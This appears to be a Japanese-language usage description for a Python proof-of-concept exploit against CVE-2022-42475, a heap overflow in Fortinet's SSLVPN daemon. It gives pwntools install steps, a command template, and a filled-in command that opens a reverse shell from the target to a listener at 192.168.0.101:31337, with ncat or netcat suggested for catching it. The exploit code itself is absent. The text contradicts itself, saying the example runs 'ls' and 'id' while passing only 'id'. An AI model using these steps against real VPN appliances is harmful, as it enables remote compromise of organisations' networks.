
Fortinet SSLVPNデーモンにおけるCVE-2022-42475ヒープオーバーフローのPythonエクスプロイト。カスタマイズ可能なターゲット、ポート、コマンドを使用してpwntools経由でリバースシェルを提供します。
PoCコード: FortinetのSSLVPNデーモンにおけるヒープオーバーフローを悪用する
pip install pwntools このコードを使用するには、ファイル(例: exploit.py)に保存し、Pythonでコマンドラインから必要な引数を指定して実行します。以下はエクスプロイトを実行するコマンドの例です。
python exploit.py <target_host> <target_port> <reverse_ip>
<target_host> はターゲットシステムのホスト名またはIPアドレス、<target_port> は脆弱なサービスのポート番号、<reverse_ip> はシェルを受け取るマシンのIPアドレスに置き換えてください。残りの引数は実行したいコマンドで、スペースで区切ります。
例えば、ターゲットシステムのIPアドレスが192.168.0.100、脆弱なサービスがポート8080で動作しており、ls コマンドと id コマンドを実行したい場合、以下のコマンドを実行します:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
これにより、192.168.0.101:31337 へのリバースシェル接続が作成され、ターゲットシステム上で ls コマンドと id コマンドが実行されます。指定したIPアドレスとポートでリスナーを実行してリバースシェルを受信する必要があることに注意してください。リスナーを作成するには、ncat や netcat などのツールを使用できます。